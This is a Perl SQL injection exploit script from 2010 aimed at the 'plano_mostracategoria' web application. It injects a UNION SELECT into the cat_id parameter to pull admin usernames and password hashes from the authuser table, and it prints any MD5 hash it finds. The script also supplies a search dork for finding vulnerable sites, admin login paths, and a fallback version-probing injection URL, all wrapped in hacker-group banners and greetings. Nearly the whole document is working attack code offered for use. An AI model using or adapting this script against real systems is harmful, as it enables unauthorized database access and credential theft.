|
# Author: [kalashnikov] # Software Link: [download link if available] / 404 # Tested on: [bk4 r1] #!/usr/bin/perl -w # plano mostracategoria (id) Remote SQL Injection Vulnerability # Author : kalashnikov # Site : http://kalashnikov-team.com + http://vbspiders.com # Group : KaLa$nikoV t34m # Date : {13-9-2010} # Software : plano_mostracategoria # Greetz : Madjix,ViRuS_HaCkErS,his0k4,el$b7 elmr7,sec4ever,red virus,hassan81,claw,RiSkY,data$hack,Cr3W-Dz,Antivirus7,El3ctr0-dz # team : VoLc4n0 --=-- stone love --=-- fla$h print "|----------------------------------------------------|\n"; print "| plano mostracategoria Remote SQL Injector |\n"; print "| |\n"; print "| Coded by : kalashnikov |\n"; print "| Dork : inurl:plano_mostracategoria |\n"; print "| |\n"; print "| admin cp : /login.php or /vadmin |\n"; print "| |\n"; print "| kalashnikov team |\n"; print "|----------------------------------------------------|\n"; use LWP::UserAgent; print "\nMasukin Target:[http://wwww.target.com/path/]: "; chomp(my $target=<STDIN>); #Nama Column $concatenation="concat(uname,char(58),passwd)volc4n0"; #Nama Table $table="authuser"; $injection="-7+union+select+"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "plano_index.php?paginas=plano_mostracategoria&cat_id=".$injection."+".$concatenation.",1,2,3,4,5,6,7+from/**/".$table."+--+"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n"; print "[+] Success !! Check target for details...\n"; print "\n"; print "Attention:\n"; print "VoLc4n0 Palestine hacker -- Jenin \n"; print " !!\n"; print "\n"; } else{print "\n[-] wah gagal bro (Belom Cebok tangan lo)...\n"; print "\n"; print "\n"; print "localhost/plano_index.php?paginas=plano_mostracategoria&cat_id=-7+union+select+@@version,2,3,4,5,6,7,8--\n"; }
|
|
|